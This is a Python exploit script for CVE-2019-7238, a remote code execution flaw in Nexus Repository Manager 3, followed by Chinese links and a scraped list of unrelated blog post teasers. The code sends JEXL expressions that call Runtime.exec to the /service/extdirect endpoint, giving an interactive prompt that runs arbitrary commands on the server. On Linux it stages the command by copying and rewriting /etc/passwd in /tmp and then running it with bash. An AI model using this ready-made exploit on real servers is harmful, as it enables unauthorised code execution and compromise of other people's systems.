from requests.packages.urllib3.exceptions import InsecureRequestWarning

import urllib3

import requests

import base64

import json

import sys

print("\nNexus Repository Manager 3 Remote Code Execution - CVE-2019-7238 \nFound by @Rico and @voidfyoo\n")

proxy = {

}

remote = 'http://127.0.0.1:8081'

ARCH="LINUX"

# ARCH="WIN"

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def checkSuccess(r):

    if r.status_code == 200:

        json_data = json.loads(r.text)

        if json_data['result']['total'] > 0:

            print("OK")

        else:

            print("KO")

            sys.exit()

    else:

        print("[-] Error status code", r.status_code)

        sys.exit()

print("[+] Checking if Content-Selectors exist =>", end=' ')

burp0_url = remote + "/service/extdirect"

burp0_headers = {"Content-Type": "application/json"}

burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==1"}, {

    "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}

r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json,

              proxies=proxy, verify=False, allow_redirects=False)

checkSuccess(r)

print("")

while True:

    try:

        if ARCH == "LINUX":

            command = input("command (not reflected)> ")

            command = base64.b64encode(command.encode('utf-8'))

            command_str = command.decode('utf-8')

            command_str = command_str.replace('/', '+')

            print("[+] Copy file to temp directory =>", end=' ')

            burp0_url = remote + "/service/extdirect"

            burp0_headers = {"Content-Type": "application/json"}

            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"cp /etc/passwd  /tmp/passwd\")"}, { "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}

            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False)

            checkSuccess(r)

            print("[+] Preparing temp file =>", end=' ')

            burp0_url = remote + "/service/extdirect"

            burp0_headers = {"Content-Type": "application/json"}

            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"sed -i 1cpwn2  /tmp/passwd\")"}, {

                "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}

            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,

                        verify=False, allow_redirects=False)

            checkSuccess(r)

            print("[+] Cleaning temp file =>", end=' ')

            burp0_url = remote + "/service/extdirect"

            burp0_headers = {"Content-Type": "application/json"}

            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"sed -i /[^pwn2]/d /tmp/passwd\")"}, {

                "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}

            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,

                            verify=False, allow_redirects=False)

            checkSuccess(r)

            print("[+] Writing command into temp file =>", end=' ')

            burp0_url = remote + "/service/extdirect"

            burp0_headers = {"Content-Type": "application/json"}

            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"sed -i 1s/pwn2/{echo," + command_str + "}|{base64,-d}>pwn.txt/g /tmp/passwd\")"}, {

                "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}

            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,

                            verify=False, allow_redirects=False)

            checkSuccess(r)

            print("[+] Decode base64 command =>", end=' ')

            burp0_url = remote + "/service/extdirect"

            burp0_headers = {"Content-Type": "application/json"}

            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"bash /tmp/passwd\")"}, {

                "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}

            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,

                            verify=False, allow_redirects=False)

            checkSuccess(r)

            print("[+] Executing command =>", end=' ')

            burp0_url = remote + "/service/extdirect"

            burp0_headers = {"Content-Type": "application/json"}

            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"bash pwn.txt\")"}, {

                "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}

            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,

                            verify=False, allow_redirects=False)

            checkSuccess(r)

            print('')

        else:

            command = input("command (not reflected)> ")

            print("[+] Executing command =>", end=' ')

            burp0_url = remote + "/service/extdirect"

            burp0_headers = {"Content-Type": "application/json"}

            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"" + command + "\")"}, {

                "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}

            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,

                              verify=False, allow_redirects=False)

            checkSuccess(r)

            print('')

    except KeyboardInterrupt:

        print("Exiting...")

        break

脚本地址:https://github.com/mpgn/CVE-2019-7238/blob/master/CVE-2019-7238.py

漏洞分析:https://cert.360.cn/report/detail?id=3ec687ec01cccd0854e2706590ddc215

CVE-2019-7238 poc的更多相关文章

  1. CVE 2019 0708 安装重启之后 可能造成 手动IP地址丢失.

    1. 最近两天发现 更新了微软的CVE 2019-0708的补丁之后 之前设置的手动ip地址会变成 自动获取, 造成ip地址丢失.. 我昨天遇到两个, 今天同事又遇到一个.微软做补丁也不走心啊..

  2. 刷题[De1CTF 2019]SSRF Me

    前置知识 本题框架是flask框架,正好python面向对象和flask框架没怎么学,借着这个好好学一下 这里我直接听mooc上北京大学陈斌老师的内容,因为讲的比较清楚,直接把他的ppt拿过来,看看就 ...

  3. [EXP]Joomla! Component Easy Shop 1.2.3 - Local File Inclusion

    # Exploit Title: Joomla! Component Easy Shop - Local File Inclusion # Dork: N/A # Date: -- # Exploit ...

  4. Debian Security Advisory(Debian安全报告) DSA-4414-1 libapache2-mod-auth-mellon security update

    Debian Security Advisory(Debian安全报告) DSA-4414-1 libapache2-mod-auth-mellon security update Package:l ...

  5. GitHub万星项目:黑客成长技术清单

    最近有个GitHub项目很火,叫"Awesome Hacking",这个项目是由Twitter账号@HackwithGithub 维护,喜欢逛Twitter的安全爱好者应该了解,在 ...

  6. 转:GitHub 万星推荐成长技术清单

    转:http://www.4hou.com/info/news/7061.html 最近两天,在reddit安全板块和Twitter上有个GitHub项目很火,叫“Awesome Hacking”. ...

  7. GitHub 万星推荐:黑客成长技术清单

    GitHub 万星推荐:黑客成长技术清单 导语:如果你需要一些安全入门引导,“Awesome Hacking”无疑是最佳选择之一. 最近两天,在reddit安全板块和Twitter上有个GitHub项 ...

  8. CVE: 2014-6271、CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 为了理解这个漏 ...

  9. 如何确定Ubuntu下是否对某个CVE打了补丁

        前些日子在月赛中,拿到了一台Ubuntu14.04的服务器,但并不是root权限,需要提权.我Google了一下,找到了CVE-2015-1318,CVE-2015-1328,CVE-2015 ...

  10. Microsoft Edge 浏览器远程代码执行漏洞POC及细节(CVE-2017-8641)

    2017年8月8日,CVE官网公布了CVE-2017-8641,在其网上的描述为: 意思是说,黑客可以通过在网页中嵌入恶意构造的javascript代码,使得微软的浏览器(如Edege),在打开这个网 ...

随机推荐

  1. shell字符串索引

    shell中的字符串索引一会从0开始,一会从1开始,见例子: #!/bin/bash string="hello world" length=${#string} echo &qu ...

  2. 201771010113 李婷华 《面向对象程序设计(Java)》第十六周总结

    一.理论知识部分 1.程序是一段静态的代码,它应用程序执行蓝 是一段静态的代码,它应用程序执行蓝 是一段静态的代码,它应用程序执行蓝本. 2.进程是程序的一次动态执行,它对应了从代码加载.执行至执行完 ...

  3. 一步一步教你PowerBI数据分析:制作客户RFM数据分析

    客户分析就是根据客户信息数据来分析客户特征,评估客户价值,从而为客户制订相应的营销策略与资源配置.通过合理.系统的客户分析,企业可以知道不同的客户有着什么样的需求,分析客户消费特征与商务效益的关系,使 ...

  4. java使用window builder图形界面开发简易计算器

    界面效果: /** * */ package calculator; import java.awt.BorderLayout; import java.awt.EventQueue; import ...

  5. STM32 Cube之旅-尝试新的开发方式

    尝试使用Cube进行一些开发学习,这里对此做一个梗概,先有一个全面的了解. 文章目录 Cube全家桶 CubeMX CubeIDE CubeProg 结语 Cube全家桶 曾几何时,ST刚推出Cube ...

  6. Android 8.1 关机充电动画(三)Android模式

    system:Android 8.1 platform:RK3326/PX30 uboot kernel system/core/healthd Android 8.1 关机充电动画(一)模式选择 A ...

  7. CF-234 F. Fence DP

    F. Fence 这个刷Fence的问题看到好几个了... 题意 有一个栅栏,由n块宽为1cm的木板组成,第i块木板高为hi,要给他们刷上油漆,有一桶红色的可以刷a平方厘米的油漆,一桶绿色的可以刷b平 ...

  8. 设计模式之GOF23建造者模式

    组件很多,装配顺序不定 本质: 1,分离了对象子组件的单独构造(Builder负责)和装配(Director负责),从而可以构造出复杂的对象,这个模式适用于某个对象的构建过程复杂的情况下使用 2,实现 ...

  9. zoj[3868]gcd期望

    题意:求n个数组成的集合的所有非空子集的gcd的期望 大致思路:对于一个数x,设以x为约数的数的个数为cnt[x],所组成的非空集合个数有2^cnt[x]-1个,这其中有一些集合的gcd是x的倍数的, ...

  10. AndroidStudio3.6升级后的坑-apk打包

    前段时间尝试了最新版的AndroidStudio3.6,整体来说gradle调试和自带的虚拟机相比较历史版本有了更香的体验. 刚好有个新项目,就直接使用最新版了,这次新版的升级除了保持原有的界面风格, ...